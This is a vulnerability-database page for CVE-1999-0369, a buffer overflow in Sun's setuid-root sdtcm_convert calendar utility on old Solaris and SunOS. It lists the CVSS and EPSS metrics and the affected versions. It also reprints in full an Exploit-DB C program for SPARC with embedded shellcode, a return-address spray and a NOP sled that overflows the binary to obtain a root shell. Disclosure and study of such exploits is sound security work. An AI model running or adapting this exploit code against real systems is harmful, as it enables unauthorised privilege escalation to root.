CVE-1999-0369 : Detail

CVE-1999-0369

0.04%V3
Local
1999-09-29
02h00 +00:00
2024-08-01
16h34 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The Sun sdtcm_convert calendar utility for OpenWindows has a buffer overflow which can gain root access.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 19128

Publication date : 1998-10-22 22h00 +00:00
Author : UNYUN
EDB Verified : Yes

/* source: https://www.securityfocus.com/bid/166/info Sdtcm_convert is a setuid-root data conversion utility which converts OpenWindows version 3 calendar data files to version 4 and vice versa. A buffer overflow condition has been found in sdtcm_convert which may be exploited to obtain root access. */ /*============================================================================= sdtcm_convert Overflow Exploits( for Sparc Edition) The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551) Written by UNYUN ([email protected]) [usage] % gcc ex_sdtcm_convert.c (This example program) % a.out If no response, hit ctrl+c # ============================================================================= */ #define ADJUST 2 #define OFFSET1 4000 #define LENGTH1 260 #define OFFSET2 6000 #define LENGTH2 1000 #define OFFSET3 6000+16*30 #define NOP 0xa61cc013 char exploit_code[] = "\x82\x10\x20\x17\x91\xd0\x20\x08" "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13" "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e" "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a" "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd4\xff\xff"; unsigned long get_sp(void) { __asm__("mov %sp,%i0 \n"); } unsigned long ret_adr; int i; main() { static char x[11000]; memset(x,'a',10000); ret_adr=get_sp()-6300; for (i = 0; i < 5000 ; i+=4){ x[i+3]=ret_adr & 0xff; x[i+2]=(ret_adr >> 8 ) &0xff; x[i+1]=(ret_adr >> 16 ) &0xff; x[i+0]=(ret_adr >> 24 ) &0xff; } ret_adr=get_sp() - 10200; if ((ret_adr & 0xff )==0) ret_adr+=4; printf("%lx\n",ret_adr); for (i = OFFSET1+ADJUST; i < OFFSET1+LENGTH1 ; i+=4){ x[i+3]=ret_adr & 0xff; x[i+2]=(ret_adr >> 8 ) &0xff; x[i+1]=(ret_adr >> 16 ) &0xff; x[i+0]=(ret_adr >> 24 ) &0xff; } for (i = OFFSET2+ADJUST; i < OFFSET2+LENGTH2 ; i+=4){ x[i+3]=NOP & 0xff; x[i+2]=(NOP >> 8 ) &0xff; x[i+1]=(NOP >> 16 ) &0xff; x[i+0]=(NOP >> 24 ) &0xff; } for (i=0;i<strlen(exploit_code);i++) x[OFFSET3+ADJUST+i]=exploit_code[i]; x[10000]=0; execl("/usr/dt/bin/sdtcm_convert", "sdtcm_convert", "-d",x,"test",(char *) 0); }

Products Mentioned

Configuraton 0

Sun>>Solaris >> Version *

Sun>>Solaris >> Version 1.1.3

    Sun>>Solaris >> Version 1.1.4

      Sun>>Solaris >> Version 2.4

        Sun>>Solaris >> Version 2.5

          Sun>>Sunos >> Version -

          Sun>>Sunos >> Version 4.1.3

          Sun>>Sunos >> Version 4.1.4

          Sun>>Sunos >> Version 5.0

          Sun>>Sunos >> Version 5.1

          Sun>>Sunos >> Version 5.2

          Sun>>Sunos >> Version 5.3

          Sun>>Sunos >> Version 5.4

          Sun>>Sunos >> Version 5.5

          Sun>>Sunos >> Version 5.5.1

          References